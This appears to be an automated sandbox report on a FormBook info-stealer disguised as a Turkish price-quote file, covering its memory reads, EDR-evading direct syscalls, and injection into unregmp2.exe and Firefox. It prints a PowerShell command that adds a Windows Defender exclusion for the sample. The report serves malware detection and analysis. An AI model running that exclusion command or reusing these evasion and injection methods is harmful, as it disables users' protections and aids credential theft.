            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4EB1D mov eax, dword ptr fs:[00000030h]7_2_01B4EB1D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4B00 mov eax, dword ptr fs:[00000030h]7_2_01BA4B00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ACCB7E mov eax, dword ptr fs:[00000030h]7_2_01ACCB7E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7EB50 mov eax, dword ptr fs:[00000030h]7_2_01B7EB50
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h]7_2_01BA2B57
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h]7_2_01BA2B57
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h]7_2_01BA2B57
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA2B57 mov eax, dword ptr fs:[00000030h]7_2_01BA2B57
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B84B4B mov eax, dword ptr fs:[00000030h]7_2_01B84B4B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B84B4B mov eax, dword ptr fs:[00000030h]7_2_01B84B4B
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B78B42 mov eax, dword ptr fs:[00000030h]7_2_01B78B42
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66B40 mov eax, dword ptr fs:[00000030h]7_2_01B66B40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B66B40 mov eax, dword ptr fs:[00000030h]7_2_01B66B40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B9AB40 mov eax, dword ptr fs:[00000030h]7_2_01B9AB40
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AC8B50 mov eax, dword ptr fs:[00000030h]7_2_01AC8B50
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8AA0 mov eax, dword ptr fs:[00000030h]7_2_01AD8AA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD8AA0 mov eax, dword ptr fs:[00000030h]7_2_01AD8AA0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B26AA4 mov eax, dword ptr fs:[00000030h]7_2_01B26AA4
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B08A90 mov edx, dword ptr fs:[00000030h]7_2_01B08A90
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01ADEA80 mov eax, dword ptr fs:[00000030h]7_2_01ADEA80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01BA4A80 mov eax, dword ptr fs:[00000030h]7_2_01BA4A80
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0AAEE mov eax, dword ptr fs:[00000030h]7_2_01B0AAEE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0AAEE mov eax, dword ptr fs:[00000030h]7_2_01B0AAEE
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B04AD0 mov eax, dword ptr fs:[00000030h]7_2_01B04AD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B04AD0 mov eax, dword ptr fs:[00000030h]7_2_01B04AD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD0AD0 mov eax, dword ptr fs:[00000030h]7_2_01AD0AD0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h]7_2_01B26ACC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h]7_2_01B26ACC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B26ACC mov eax, dword ptr fs:[00000030h]7_2_01B26ACC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AFEA2E mov eax, dword ptr fs:[00000030h]7_2_01AFEA2E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0CA38 mov eax, dword ptr fs:[00000030h]7_2_01B0CA38
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0CA24 mov eax, dword ptr fs:[00000030h]7_2_01B0CA24
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF4A35 mov eax, dword ptr fs:[00000030h]7_2_01AF4A35
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AF4A35 mov eax, dword ptr fs:[00000030h]7_2_01AF4A35
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B5CA11 mov eax, dword ptr fs:[00000030h]7_2_01B5CA11
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4CA72 mov eax, dword ptr fs:[00000030h]7_2_01B4CA72
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B4CA72 mov eax, dword ptr fs:[00000030h]7_2_01B4CA72
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B7EA60 mov eax, dword ptr fs:[00000030h]7_2_01B7EA60
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B0CA6F mov eax, dword ptr fs:[00000030h]7_2_01B0CA6F
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtProtectVirtualMemory: Direct from: 0x77542F9CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtSetInformationProcess: Direct from: 0x77542C5CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtOpenKeyEx: Direct from: 0x77542B9CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtProtectVirtualMemory: Direct from: 0x77537B2EJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtCreateFile: Direct from: 0x77542FECJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtOpenFile: Direct from: 0x77542DCCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQueryInformationToken: Direct from: 0x77542CACJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtTerminateThread: Direct from: 0x77542FCCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtDeviceIoControlFile: Direct from: 0x77542AECJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtAllocateVirtualMemory: Direct from: 0x77542BECJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtOpenSection: Direct from: 0x77542E0CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtAllocateVirtualMemory: Direct from: 0x775448ECJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtSetInformationThread: Direct from: 0x775363F9Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQuerySystemInformation: Direct from: 0x775448CCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtReadVirtualMemory: Direct from: 0x77542E8CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtCreateKey: Direct from: 0x77542C6CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtSetInformationThread: Direct from: 0x77542B4CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQueryAttributesFile: Direct from: 0x77542E6CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtAllocateVirtualMemory: Direct from: 0x77543C9CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtCreateUserProcess: Direct from: 0x7754371CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQueryInformationProcess: Direct from: 0x77542C26Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtResumeThread: Direct from: 0x77542FBCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtWriteVirtualMemory: Direct from: 0x7754490CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtDelayExecution: Direct from: 0x77542DDCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtAllocateVirtualMemory: Direct from: 0x77542BFCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtReadFile: Direct from: 0x77542ADCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtQuerySystemInformation: Direct from: 0x77542DFCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtResumeThread: Direct from: 0x775436ACJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory written: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: NULL target: C:\Windows\SysWOW64\unregmp2.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\unregmp2.exeThread register set: target process: 7852Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\unregmp2.exeThread APC queued: target process: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
